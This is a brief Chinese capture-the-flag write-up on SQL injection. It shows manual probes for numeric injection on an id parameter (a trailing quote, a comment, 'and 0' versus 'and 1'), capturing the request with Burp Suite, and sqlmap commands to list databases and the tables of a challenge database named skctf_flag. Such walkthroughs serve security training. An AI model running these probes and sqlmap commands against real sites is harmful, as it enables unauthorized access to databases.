1.题目
2.查看是否存在注入漏洞
测试:如果id=1后面加‘ 不正常 加-- l恢复正常,说明存在数字型漏洞
两个都不正常说明不存在数字型注入
如果 id=1后面接 and 0 页面没有内容 and 1 页面正常显示内容说明有数字型漏洞
如果都不正常说明没有数字型漏洞
3.存在漏洞找注入点
使用burpsuite抓包,找到注入点,将抓取到的数据包保存成txt文件。
4.使用sqlmap进行注入
sqlmap.py -r "C:\Users\sakuraty\Desktop\dat.txt" -p id --dbs
Y
N
Y
找到数据库,information_schema是默认数据库,所以查看skctf_flag库,猜数据库中的表
sqlmap.py -r "C:\Users\sakuraty\Desktop\dat.txt" -p id -D skctf_flag --tables